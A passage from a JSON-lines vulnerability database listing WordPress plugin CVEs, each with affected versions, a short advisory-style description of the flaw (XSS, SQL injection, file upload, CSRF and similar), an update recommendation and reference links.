version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elisqlreports\\\/tags\\\/4..11.13\\\/index.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elisqlreports\\\/tags\\\/4..11.13\\\/index.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elisqlreports\\\/tags\\\/4..11.15\\\/index.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elisqlreports\\\/tags\\\/4..11.15\\\/index.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elisqlreports\\\/tags\\\/4..11.33\\\/index.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elisqlreports\\\/tags\\\/4..11.33\\\/index.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elisqlreports\\\/tags\\\/4.11.37\\\/index.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elisqlreports\\\/tags\\\/4.11.37\\\/index.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elisqlreports\\\/tags\\\/4.16.38\\\/index.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elisqlreports\\\/tags\\\/4.16.38\\\/index.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elisqlreports\\\/tags\\\/4.17.38\\\/index.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elisqlreports\\\/tags\\\/4.17.38\\\/index.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elisqlreports\\\/tags\\\/4.17.42\\\/index.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elisqlreports\\\/tags\\\/4.17.42\\\/index.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elisqlreports\\\/tags\\\/5.21.35\\\/index.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elisqlreports\\\/tags\\\/5.21.35\\\/index.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elisqlreports\\\/tags\\\/5.25.08\\\/index.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elisqlreports\\\/tags\\\/5.25.08\\\/index.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eade6ab0-ff79-4107-83ce-e85b37d97442?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eade6ab0-ff79-4107-83ce-e85b37d97442?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8009","slug":"security-ninja","versionImpact":"5.242","versionEndExcluding":"5.243","description":"The Security Ninja \u2013 WordPress Security Plugin & Firewall plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 5.242 via the 'get_file_source' function. This makes it possible for authenticated attackers, with Administrator-level access and above, to extract sensitive data, including the contents of any file on the server.","recommendation":"Update to version 5.243, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/security-ninja\\\/trunk\\\/modules\\\/core-scanner\\\/core-scanner.php#L186\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/security-ninja\\\/trunk\\\/modules\\\/core-scanner\\\/core-scanner.php#L186\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/security-ninja\\\/trunk\\\/modules\\\/core-scanner\\\/core-scanner.php#L33\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/security-ninja\\\/trunk\\\/modules\\\/core-scanner\\\/core-scanner.php#L33\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3333048\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3333048\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/51ee45f8-9978-48ec-8f87-229dc82938a8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/51ee45f8-9978-48ec-8f87-229dc82938a8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13351","slug":"social-testimonials-and-reviews-widget","versionImpact":"5.20","versionEndExcluding":"5.21","description":"The Social proof testimonials and reviews by Repuso plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'rw_image_badge1' shortcode in all versions up to, and including, 5.20 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.21, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3222107\\\/social-testimonials-and-reviews-widget\\\/trunk\\\/social-testimonials-and-reviews-widget.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3222107\\\/social-testimonials-and-reviews-widget\\\/trunk\\\/social-testimonials-and-reviews-widget.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ff7ead53-4b20-48ba-95cd-118fb4eab330?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ff7ead53-4b20-48ba-95cd-118fb4eab330?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8725","slug":"file-manager-advanced","versionImpact":"5.2.8","versionEndExcluding":"5.2.9","description":"Multiple plugins and\/or themes for WordPress are vulnerable to Limited File Upload in various versions. This is due to a lack of proper checks to ensure lower-privileged roles cannot upload .css and .js files to arbitrary directories. This makes it possible for authenticated attackers, with Subscriber-level access and above, and granted permissions by an administrator, to upload .css and .js files to any directory within the WordPress root directory, which could lead to Stored Cross-Site Scripting. The Advanced File Manager Shortcodes plugin must be installed to exploit this vulnerability.","recommendation":"Update to version 5.2.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce2b4f93-93a6-480f-a877-ca47bd133bb6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce2b4f93-93a6-480f-a877-ca47bd133bb6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-manager-advanced\\\/trunk\\\/application\\\/class_fma_main.php#L24\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-manager-advanced\\\/trunk\\\/application\\\/class_fma_main.php#L24\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-manager-advanced\\\/trunk\\\/application\\\/class_fma_shortcode.php#L28\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-manager-advanced\\\/trunk\\\/application\\\/class_fma_shortcode.php#L28\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3157713\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3157713\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8704","slug":"file-manager-advanced","versionImpact":"5.2.8","versionEndExcluding":"5.2.9","description":"The Advanced File Manager plugin for WordPress is vulnerable to Local JavaScript File Inclusion in all versions up to, and including, 5.2.8 via the 'fma_locale' parameter. This makes it possible for authenticated attackers, with Administrator-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 5.2.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5b783cc6-d79d-43ef-948a-a1953d383ca3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5b783cc6-d79d-43ef-948a-a1953d383ca3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-manager-advanced\\\/trunk\\\/application\\\/class_fma_main.php#L152\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-manager-advanced\\\/trunk\\\/application\\\/class_fma_main.php#L152\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3157713\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3157713\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8126","slug":"file-manager-advanced","versionImpact":"5.2.8","versionEndExcluding":"5.2.9","description":"The Advanced File Manager plugin for WordPress is vulnerable to arbitrary file uploads via the 'class_fma_connector.php' file in all versions up to, and including, 5.2.8. This makes it possible for authenticated attackers, with Subscriber-level access and above, and granted permissions by an Administrator, to upload a new .htaccess file allowing them to subsequently upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 5.2.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/801d6cde-f9c6-4e68-8bfc-ff8c0593372d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/801d6cde-f9c6-4e68-8bfc-ff8c0593372d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-manager-advanced\\\/trunk\\\/application\\\/class_fma_connector.php?rev=3004748\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-manager-advanced\\\/trunk\\\/application\\\/class_fma_connector.php?rev=3004748\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3157713\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3157713\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6724","slug":"magic-post-thumbnail","versionImpact":"5.2.7","versionEndExcluding":"5.2.8","description":"The Generate Images  WordPress plugin before 5.2.8 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 5.2.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0cb3158a-263d-4c4a-8029-62b453c281cb\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0cb3158a-263d-4c4a-8029-62b453c281cb\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3478","slug":"mwp-herd-effect","versionImpact":"5.2.6","versionEndExcluding":"5.2.7","description":"The Herd Effects  WordPress plugin before 5.2.7 does not have CSRF checks in some bulk actions, which could allow attackers to make logged in admins perform unwanted actions, such as deleting effects via CSRF attacks","recommendation":"Update to version 5.2.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/09f1a696-86ee-47cc-99de-57cfd2a3219d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/09f1a696-86ee-47cc-99de-57cfd2a3219d\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10646","slug":"fluentform","versionImpact":"5.2.6","versionEndExcluding":"5.2.7","description":"The Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the form's subject parameter in all versions up to, and including, 5.2.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.2.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fluentform\\\/tags\\\/5.2.4\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fluentform\\\/tags\\\/5.2.4\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3203147\\\/fluentform\\\/trunk\\\/boot\\\/globals.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3203147\\\/fluentform\\\/trunk\\\/boot\\\/globals.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/41c2ec31-360d-4145-b0b4-77d4d1d4b8a1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/41c2ec31-360d-4145-b0b4-77d4d1d4b8a1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9548","slug":"wp-slimstat","versionImpact":"5.2.6","versionEndExcluding":"5.2.7","description":"The SlimStat Analytics plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the resource parameter in all versions up to, and including, 5.2.6 due to insufficient input sanitization and output escaping when logging visitor requests. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.2.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fa91912d-5794-4c96-8a13-bd54ce0f1deb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fa91912d-5794-4c96-8a13-bd54ce0f1deb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-slimstat\\\/tags\\\/5.2.6\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-slimstat\\\/tags\\\/5.2.6\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-slimstat\\\/tags\\\/5.2.6\\\/admin\\\/view\\\/right-now.php#L196\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-slimstat\\\/tags\\\/5.2.6\\\/admin\\\/view\\\/right-now.php#L196\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13382","slug":"calculated-fields-form","versionImpact":"5.2.63","versionEndExcluding":"5.2.64","description":"The Calculated Fields Form WordPress plugin before 5.2.64 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 5.2.64, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/925de4af-fc71-45ae-8454-7e4f70be13ca\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/925de4af-fc71-45ae-8454-7e4f70be13ca\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12601","slug":"calculated-fields-form","versionImpact":"5.2.63","versionEndExcluding":"5.2.64","description":"The Calculated Fields Form plugin for WordPress is vulnerable to Denial of Service in all versions up to, and including, 5.2.63. This is due to unlimited height and width parameters for CAPTCHA images. This makes it possible for unauthenticated attackers to send multiple requests with large values, resulting in slowing server resources if the server does not mitigate Denial of Service attacks.","recommendation":"Update to version 5.2.64, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/calculated-fields-form\\\/trunk\\\/captcha\\\/captcha.php#L74\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/calculated-fields-form\\\/trunk\\\/captcha\\\/captcha.php#L74\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/calculated-fields-form\\\/trunk\\\/captcha\\\/captcha.php#L75\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/calculated-fields-form\\\/trunk\\\/captcha\\\/captcha.php#L75\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3207826\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3207826\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1eade2ed-9a75-4857-a2c5-a21e016e7029?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1eade2ed-9a75-4857-a2c5-a21e016e7029?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13381","slug":"calculated-fields-form","versionImpact":"5.2.61","versionEndExcluding":"5.2.62","description":"The Calculated Fields Form WordPress plugin before 5.2.62 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 5.2.62, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/da099e52-7f7b-4d76-a0bc-a46315510e0a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/da099e52-7f7b-4d76-a0bc-a46315510e0a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12273","slug":"calculated-fields-form","versionImpact":"5.2.61","versionEndExcluding":"5.2.62","description":"The Calculated Fields Form WordPress plugin before 5.2.62 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 5.2.62, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/90333618-2be7-49cf-822a-819699f07977\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/90333618-2be7-49cf-822a-819699f07977\\\/\",\"refsource\":\"\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]}]"}
{"CVE_ID":"CVE-2025-5487","slug":"automatorwp","versionImpact":"5.2.5","versionEndExcluding":"5.2.6","description":"The AutomatorWP \u2013 Automator plugin for no-code automations, webhooks & custom integrations in WordPress plugin for WordPress is vulnerable to time-based SQL Injection via the field_conditions parameter in all versions up to, and including, 5.2.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. Administrators can configure the plugin to allow access to this functionality to authors and higher.","recommendation":"Update to version 5.2.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/automatorwp\\\/tags\\\/5.2.3\\\/integrations\\\/automatorwp\\\/triggers\\\/all-posts.php#L256\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/automatorwp\\\/tags\\\/5.2.3\\\/integrations\\\/automatorwp\\\/triggers\\\/all-posts.php#L256\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3307465%40automatorwp%2Ftrunk&old=3302138%40automatorwp%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3307465%40automatorwp%2Ftrunk&old=3302138%40automatorwp%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3e1a84c6-e28b-42fe-a16a-aeb227cfe956?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3e1a84c6-e28b-42fe-a16a-aeb227cfe956?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13317","slug":"shipworks-e-commerce-bridge","versionImpact":"5.2.5","versionEndExcluding":"5.2.6","description":"The ShipWorks Connector for Woocommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 5.2.5. This is due to missing or incorrect nonce validation on the 'shipworks-wordpress' page. This makes it possible for unauthenticated attackers to update the services username and password via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 5.2.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3223835%40shipworks-e-commerce-bridge&new=3223835%40shipworks-e-commerce-bridge&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3223835%40shipworks-e-commerce-bridge&new=3223835%40shipworks-e-commerce-bridge&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/503c00f5-59e5-4ca2-ac3d-a3f38a993f0d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/503c00f5-59e5-4ca2-ac3d-a3f38a993f0d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2711","slug":"ultimate-product-catalogue","versionEndExcluding":"5.2.6","description":"The Ultimate Product Catalog WordPress plugin before 5.2.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/71c5b5b5-8694-4738-8e4b-8670a8d21c86\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/71c5b5b5-8694-4738-8e4b-8670a8d21c86\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1037","slug":"all-in-one-wp-security-and-firewall","versionImpact":"5.2.5","versionEndExcluding":"5.2.6","description":"The All-In-One Security (AIOS) \u2013 Security and Firewall plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'tab' parameter in all versions up to, and including, 5.2.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 5.2.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b50772e5-5142-4f50-b5c0-6116a8821cba?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b50772e5-5142-4f50-b5c0-6116a8821cba?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-in-one-wp-security-and-firewall\\\/trunk\\\/admin\\\/wp-security-list-404.php#L32\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-in-one-wp-security-and-firewall\\\/trunk\\\/admin\\\/wp-security-list-404.php#L32\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-in-one-wp-security-and-firewall\\\/trunk\\\/admin\\\/wp-security-list-404.php#L50\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-in-one-wp-security-and-firewall\\\/trunk\\\/admin\\\/wp-security-list-404.php#L50\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3032127\\\/all-in-one-wp-security-and-firewall\\\/tags\\\/5.2.6\\\/admin\\\/wp-security-list-404.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3032127\\\/all-in-one-wp-security-and-firewall\\\/tags\\\/5.2.6\\\/admin\\\/wp-security-list-404.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5598","slug":"file-manager-advanced","versionImpact":"5.2.4","versionEndExcluding":"5.2.5","description":"The Advanced File Manager plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 5.2.4 via the 'fma_local_file_system' function. This makes it possible for unauthenticated attackers to extract sensitive data including backups or other sensitive information if the files have been moved to the built-in Trash folder.","recommendation":"Update to version 5.2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9d4ff5ed-8857-46b8-942b-ac0f47880a95?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9d4ff5ed-8857-46b8-942b-ac0f47880a95?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-manager-advanced\\\/trunk\\\/application\\\/class_fma_connector.php#L13\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-manager-advanced\\\/trunk\\\/application\\\/class_fma_connector.php#L13\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3107587\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3107587\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9940","slug":"calculated-fields-form","versionImpact":"5.2.45","versionEndExcluding":"5.2.46","description":"The Calculated Fields Form plugin for WordPress is vulnerable to HTML Injection in all versions up to, and including, 5.2.45. This is due to the plugin not properly neutralizing HTML elements from submitted forms. This makes it possible for unauthenticated attackers to inject arbitrary HTML that will render when the administrator views form submissions in their email.","recommendation":"Update to version 5.2.46, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e2c9f6a5-8698-4452-bf0a-c1d796b2fdad?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e2c9f6a5-8698-4452-bf0a-c1d796b2fdad?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3168950%40calculated-fields-form&new=3168950%40calculated-fields-form&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3168950%40calculated-fields-form&new=3168950%40calculated-fields-form&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4318","slug":"mwp-herd-effect","versionEndExcluding":"5.2.4","description":"The Herd Effects WordPress plugin before 5.2.4 does not have CSRF when deleting its items, which could allow attackers to make logged in admins delete arbitrary effects via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/93b40030-3706-4063-bf59-4ec983afdbb6\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/93b40030-3706-4063-bf59-4ec983afdbb6\",\"refsource\":\"MISC\",\"tags\":[]}]"}
